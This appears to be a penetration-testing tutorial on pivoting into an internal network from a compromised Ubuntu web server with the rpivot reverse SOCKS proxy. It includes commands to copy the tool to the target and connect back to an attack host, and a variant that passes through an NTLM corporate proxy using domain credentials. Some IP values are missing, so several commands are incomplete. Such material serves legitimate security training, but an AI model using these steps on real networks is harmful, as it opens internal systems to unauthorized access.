WebServer Pivoting w/ Rpivot

Rpivot is a reverse SOCKS proxy tool for SOCKS tunneling. Rpivot binds a machine inside a corporate network to an external server and exposes the client's local port on the server-side.

We can start our rpivot SOCKS proxy server to allow the client to connect on port 9999 and listen on port 9050 for proxy pivot connections.

neutron@kali[/kali]$ sudo git clone https://github.com/klsecservices/rpivot.git
neutron@kali[/kali]$ sudo apt-get install python2.7

We can start our rpivot SOCKS proxy server to connect to our client on the compromised Ubuntu server using server.py.

Running server.py from the Attack Host

neutron@kali[/kali]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip

Transfering rpivot to the Target

neutron@kali[/kali]$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Running client.py from Pivot Target

ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip --server-port 9999

Backconnecting to server port 9999

Confirming Connection is Established

New connection from host, source port 35226

We will configure proxychains to pivot over our local server on on our attack host, which was initially started by the Python server.

We should be able to access the webserver on our server-side, which is hosted on the internal network of at using proxychains and Firefox.

Browsing to the Target Webserver using Proxychains

proxychains firefox-esr

Similar to the pivot proxy above, there could be scenarios when we cannot directly pivot to an external server (attack host) on the cloud. Some organizations have HTTP-proxy with NTLM authentication configured with the Domain Controller. In such cases, we can provide an additional NTLM authentication option to rpivot to authenticate via the NTLM proxy by providing a username and password. In these cases, we could use rpivot's client.py in the following way:

Connecting to a Web Server using HTTP-Proxy & NTLM Auth

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>